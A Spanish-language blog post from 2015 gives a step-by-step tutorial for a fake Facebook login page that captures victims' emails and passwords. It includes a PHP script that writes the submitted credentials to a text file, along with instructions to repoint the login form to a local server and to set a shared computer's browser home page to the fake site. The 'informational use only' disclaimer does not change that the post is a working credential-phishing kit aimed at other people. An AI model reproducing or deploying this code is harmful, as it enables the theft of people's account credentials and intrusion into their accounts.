miércoles, 4 de febrero de 2015

Este tutorial, es solo para uso informativo, te enseñara a como hacer una pagina de facebook falsa para que las victimas crean estar en la pagina original de facebook y guardar el nombre de usuario y la contaseña en un documento .txt. No a hackear el servidor de facebook.

1.-Vamos a la pagina original de facebook http://www.facebook.com le damos click derecho sobre la pagina y "ver codigo fuente de esta pagina".



2.-Copiamos todo el codigo fuente y lo pegamos en un documento de texto (.txt) nuevo y lo guardamos con extension .php con el nombre facebook.





3.-Creamos un  nuevo documento llamado error con extension .php con el siguiente codigo dentro:

<?php 
            $user=$_POST['email'];
            $pass=$_POST['pass'];

$file = fopen("archivo.txt", "w");
fwrite($file, '--------------------------' . PHP_EOL);
fwrite($file, $user . PHP_EOL);
fwrite($file, $pass . PHP_EOL);
fclose($file);

echo "Error ir a <a href="http://www.facebook.com">http://www.facebook.com</a>";
?>
lo anterior nos crea un archivo txt llamado "archivo.txt" y escribe dentro de el, el e-mail y contraseña del usuario y al final solo marca un error y el link para ir a la pagina oficial de facebook, asi nuestras victimas no tendran idea de que fue lo que paso.

Ahora ya tenemos dos archivos facebook.php y error.php.


4.-Volvemos al archivo llamado facebook.php que acabamos de crear en el paso 2, lo abrimos con un editor de texto simple (notepad, worpad, gedit, textedit, etc.); buscamos una linea de texto donde se encuentra lo siguiente:

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

Quisa sea un poco complicado encontrarlo pero si abrimos el buscador en nuestro editor de texto y pegamos el codigo anterior lo encontraremos




Ahi sustituimos la parte de

action="https://www.facebook.com/login.php?login_attempt=1"

por

action="https://localhost/facebook.php"

solo esa parte!!!

Y lo guardamos.

Esto, lo que hace es, que en lugar de dirigir la pagina al login nos mandara a nuestro documento error.php creado anteriormente.



5.-Ahora lo que hace falta es instalar un servidor php para que nuestra trampa funcionesesto es facil solo descargamos wampserver y lo instalamos (si tienes una distribucion linux entonces deveras descargar Lamp, o si tienes Mac entonces descargas Mamp o Xamp).

6.- los documentos que creamos anteriormente los guardamos en la carpeta de nuestro servidor que se encuentra en disco duro C:/wamp/www

7.- configuramos nuestro navegador (chrome, internet explorer o firefox) para que habra nuestra pagina de inicio la direccion "http://localhost/facebook.php"

Y listo alguien abrira Chrome se abrira nuestro documento como si fuera facebook quedra entrar y lo mandara a error.php el cual guardara la contraseña y el correo del usuario.
Lo unico que nos queda hacer es ir a C:/wamp/www y abrir el documento archivo.txt y ahi estan las contraseñas guardadas.












Publicado por en No hay comentarios:
Suscribirse a: Entradas (Atom)